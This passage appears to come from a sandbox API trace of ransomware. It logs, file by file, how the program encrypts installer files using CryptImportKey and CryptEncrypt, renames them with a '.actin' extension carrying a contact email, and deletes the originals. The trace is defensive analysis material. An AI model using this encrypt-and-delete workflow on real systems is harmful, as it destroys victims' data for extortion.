"c:\\588bce7c90097ed212\\1025\\localizeddata.xml")) returned 0x80 [0045.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.780] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.780] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.781] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.781] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.781] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf59168) returned 1 [0045.781] CryptSetKeyParam (hKey=0xf59168, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.781] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x121e6, lpOverlapped=0x0) returned 1 [0045.783] CryptEncrypt (in: hKey=0xf59168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x121f0, dwBufLen=0x121f0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x121f0) returned 1 [0045.783] WriteFile (in: hFile=0x308, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x121f0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x121f0, lpOverlapped=0x0) returned 1 [0045.785] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf59228) returned 1 [0045.785] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.785] CryptEncrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0045.785] CryptDestroyKey (hKey=0xf59228) returned 1 [0045.785] WriteFile (in: hFile=0x308, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0045.785] CryptDestroyKey (hKey=0xf59168) returned 1 [0045.785] CloseHandle (hObject=0x2e4) returned 1 [0045.786] CloseHandle (hObject=0x308) returned 1 [0045.787] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1025\\localizeddata.xml")) returned 1 [0045.789] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0045.789] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.790] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=17240) returned 1 [0045.790] CloseHandle (hObject=0x308) returned 1 [0045.790] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll")) returned 0x80 [0045.790] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.790] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.790] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.790] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.790] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.790] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf58ee8) returned 1 [0045.790] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.790] ReadFile (in: hFile=0x308, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x4358, lpOverlapped=0x0) returned 1 [0045.792] CryptEncrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4360, dwBufLen=0x4360 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4360) returned 1 [0045.792] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x4360, lpOverlapped=0x0) returned 1 [0045.793] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf590a8) returned 1 [0045.793] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.793] CryptEncrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0045.793] CryptDestroyKey (hKey=0xf590a8) returned 1 [0045.793] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0045.793] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0045.793] CloseHandle (hObject=0x308) returned 1 [0045.793] CloseHandle (hObject=0x2e4) returned 1 [0045.795] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll")) returned 1 [0045.796] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0045.796] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.796] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=6309) returned 1 [0045.796] CloseHandle (hObject=0x2e4) returned 1 [0045.796] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf")) returned 0x80 [0045.796] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.796] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.796] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.796] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.796] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.798] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf59228) returned 1 [0045.798] CryptSetKeyParam (hKey=0xf59228, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.798] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x18a5, lpOverlapped=0x0) returned 1 [0045.799] CryptEncrypt (in: hKey=0xf59228, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x18b0, dwBufLen=0x18b0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x18b0) returned 1 [0045.799] WriteFile (in: hFile=0x308, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x18b0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x18b0, lpOverlapped=0x0) returned 1 [0045.800] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf58ee8) returned 1 [0045.800] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.800] CryptEncrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0045.800] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0045.800] WriteFile (in: hFile=0x308, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0045.801] CryptDestroyKey (hKey=0xf59228) returned 1 [0045.801] CloseHandle (hObject=0x2e4) returned 1 [0045.801] CloseHandle (hObject=0x308) returned 1 [0045.801] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf")) returned 1 [0045.802] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0045.802] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.802] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=60816) returned 1 [0045.802] CloseHandle (hObject=0x308) returned 1 [0045.802] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml")) returned 0x80 [0045.803] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.803] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.803] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.803] SetFilePointerEx (in: hFile=0x308, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0045.803] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0045.803] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf58ee8) returned 1 [0045.803] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.803] ReadFile (in: hFile=0x308, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xed90, lpOverlapped=0x0) returned 1 [0045.805] CryptEncrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xeda0, dwBufLen=0xeda0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xeda0) returned 1 [0045.806] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xeda0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xeda0, lpOverlapped=0x0) returned 1 [0045.807] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf590a8) returned 1 [0045.807] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0045.808] CryptEncrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0045.808] CryptDestroyKey (hKey=0xf590a8) returned 1 [0045.808] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0045.808] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0045.808] CloseHandle (hObject=0x308) returned 1 [0045.808] CloseHandle (hObject=0x2e4) returned 1 [0046.055] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1028\\localizeddata.xml")) returned 1 [0046.056] SetEvent (hEvent=0x2e8) returned 1 [0046.058] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.058] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.213] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=18264) returned 1 [0046.213] CloseHandle (hObject=0x300) returned 1 [0046.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll")) returned 0x80 [0046.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.214] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.214] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.214] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.214] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.214] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71c80) returned 1 [0046.214] CryptSetKeyParam (hKey=0xf71c80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.214] ReadFile (in: hFile=0x300, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x4758, lpOverlapped=0x0) returned 1 [0046.224] CryptEncrypt (in: hKey=0xf71c80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4760, dwBufLen=0x4760 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4760) returned 1 [0046.224] WriteFile (in: hFile=0x32c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x4760, lpOverlapped=0x0) returned 1 [0046.225] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71e40) returned 1 [0046.225] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.225] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0046.225] CryptDestroyKey (hKey=0xf71e40) returned 1 [0046.225] WriteFile (in: hFile=0x32c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0046.225] CryptDestroyKey (hKey=0xf71c80) returned 1 [0046.225] CloseHandle (hObject=0x300) returned 1 [0046.225] CloseHandle (hObject=0x32c) returned 1 [0046.226] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll")) returned 1 [0046.227] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.227] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.231] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=82346) returned 1 [0046.231] CloseHandle (hObject=0x300) returned 1 [0046.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml")) returned 0x80 [0046.231] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.232] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.232] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.232] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.232] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.232] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71dc0) returned 1 [0046.232] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.232] ReadFile (in: hFile=0x300, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x141aa, lpOverlapped=0x0) returned 1 [0046.238] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x141b0, dwBufLen=0x141b0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x141b0) returned 1 [0046.238] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x141b0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x141b0, lpOverlapped=0x0) returned 1 [0046.240] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71d00) returned 1 [0046.240] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.240] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0046.240] CryptDestroyKey (hKey=0xf71d00) returned 1 [0046.240] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0046.240] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0046.240] CloseHandle (hObject=0x300) returned 1 [0046.241] CloseHandle (hObject=0x320) returned 1 [0046.242] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1031\\localizeddata.xml")) returned 1 [0046.244] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.244] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.249] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=8876) returned 1 [0046.249] CloseHandle (hObject=0x2e4) returned 1 [0046.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: 